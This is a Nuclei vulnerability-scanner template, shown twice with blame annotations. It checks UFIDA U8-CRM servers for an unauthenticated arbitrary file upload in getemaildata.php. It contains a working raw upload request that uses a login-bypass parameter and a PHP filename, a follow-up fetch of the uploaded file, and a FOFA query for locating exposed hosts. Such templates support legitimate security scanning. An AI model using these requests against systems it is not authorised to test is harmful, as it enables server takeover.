nuclei-templates/http/vulnerabilities/yonyou/yonyou-u8-crm-fileupload.yaml

id: yonyou-u8-crm-fileupload

info:
  name: UFIDA U8-CRM getemaildata - Arbitary File Upload
  author: SleepingBag945,pussycat0x
  severity: critical
  description: |
    There is an arbitrary file upload vulnerability in the getemaildata.php file of UFIDA U8 CRM customer relationship management system. An attacker can obtain server permissions through the vulnerability and attack the server.
  metadata:
    max-request: 2
    fofa-query: body="用友U8CRM"
    verified: true
  tags: yonyou,file-upload,u8-crm,intrusive

http:
  - raw:
      - |
        POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 300
        Cache-Control: max-age=0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
        Origin: null
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAVuAKsvesmnWtgEP
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.8
        Cookie: PHPSESSID=ibru7pqnplhi720caq0ev8uvt0

        ------WebKitFormBoundaryAVuAKsvesmnWtgEP
        Content-Disposition: form-data; name="file"; filename="%s.php "
        Content-Type: application/octet-stream

        {{randstr}}
        ------WebKitFormBoundaryAVuAKsvesmnWtgEP
        Content-Disposition: form-data; name="upload"

        upload
        ------WebKitFormBoundaryAVuAKsvesmnWtgEP--


      - |
        GET /tmpfile/{{path}}.tmp.mht HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code_1==200 && status_code_2==200"
          - "contains(body_2, '{{randstr}}')"
        condition: and

    extractors:
      - type: regex
        part: body_1
        internal: true
        name: path
        group: 1
        regex:
          - '([a-zA-Z0-9]+)\.tmp\.mht'
Update -Template 2023-09-15 14:29:07 +00:00			`id: yonyou-u8-crm-fileupload`

			`info:`
			`name: UFIDA U8-CRM getemaildata - Arbitary File Upload`
			`author: SleepingBag945,pussycat0x`
			`severity: critical`
			`description: \|`
			`There is an arbitrary file upload vulnerability in the getemaildata.php file of UFIDA U8 CRM customer relationship management system. An attacker can obtain server permissions through the vulnerability and attack the server.`
			`metadata:`
			`max-request: 2`
			`fofa-query: body="用友U8CRM"`
			`verified: true`
updated templates 2023-09-17 16:11:07 +00:00			`tags: yonyou,file-upload,u8-crm,intrusive`
Update -Template 2023-09-15 14:29:07 +00:00
			`http:`
			`- raw:`
			`- \|`
			`POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Length: 300`
			`Cache-Control: max-age=0`
			`Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8`
			`Origin: null`
			`Upgrade-Insecure-Requests: 1`
			`User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36`
			`Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAVuAKsvesmnWtgEP`
			`Accept-Encoding: gzip, deflate`
			`Accept-Language: zh-CN,zh;q=0.8`
			`Cookie: PHPSESSID=ibru7pqnplhi720caq0ev8uvt0`

			`------WebKitFormBoundaryAVuAKsvesmnWtgEP`
			`Content-Disposition: form-data; name="file"; filename="%s.php "`
			`Content-Type: application/octet-stream`

			`{{randstr}}`
			`------WebKitFormBoundaryAVuAKsvesmnWtgEP`
			`Content-Disposition: form-data; name="upload"`

			`upload`
			`------WebKitFormBoundaryAVuAKsvesmnWtgEP--`


			`- \|`
			`GET /tmpfile/{{path}}.tmp.mht HTTP/1.1`
			`Host: {{Hostname}}`

			`matchers:`
			`- type: dsl`
			`dsl:`
			`- "status_code_1==200 && status_code_2==200"`
			`- "contains(body_2, '{{randstr}}')"`
			`condition: and`

			`extractors:`
			`- type: regex`
			`part: body_1`
			`internal: true`
			`name: path`
			`group: 1`
			`regex:`
			`- '([a-zA-Z0-9]+)\.tmp\.mht'`